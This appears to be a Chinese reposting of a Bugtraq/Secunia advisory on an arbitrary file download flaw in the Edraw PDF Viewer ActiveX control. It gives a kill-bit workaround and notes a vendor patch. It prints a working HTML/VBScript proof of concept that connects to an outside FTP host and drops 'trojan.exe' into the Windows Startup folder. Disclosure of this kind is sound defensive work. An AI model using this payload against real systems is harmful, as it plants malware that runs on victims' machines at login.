Edraw PDF Viewer Component任意文件上传漏洞

受影响系统:

EDraw PDF Viewer Component 3.2

不受影响系统:

EDraw PDF Viewer Component 3.2.0.126

描述:


BUGTRAQ  ID: 35428

Edraw PDF Viewer Component是轻型的ActiveX空间,允许应用程序显示和操作PDF文件。

PDFVIEWER.PDFViewerCtrl.1 ActiveX控件(pdfviewer.ocx)所提供的FtpDownloadFile()方式没有正确地验证用户所提供的输入参数,如果用户受骗访问了恶意网页,就可能向系统上的任意位置下载文件。

<*来源:Jambalaya
  
  链接:http://secunia.com/advisories/35509/
        http://marc.info/?l=full-disclosure&m=124530759507884&q=p5
*>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<body>
<BR><object classid="clsid:44A8091F-8F01-43B7-8CF7-4BBA71E61E04" id="target" width="67" height="50" codebase="http://www.ocxt.com/download/officeviewer.cab#6,0,612,1"></object>
<BR><BR>
<script language="vbscript">
target.FtpConnect "ftp://192.168.220.201", "test", "tester"
target.FtpDownloadFile "trojan.exe", "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\trojan.exe"
target.FtpDisConnect
</script>
</body>
</html>

建议:


临时解决方法:

* 为clsid:44A8091F-8F01-43B7-8CF7-4BBA71E61E04设置kill bit。

厂商补丁:

EDraw
—–
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.ocxt.com/

发表评论?

0 条评论。

发表评论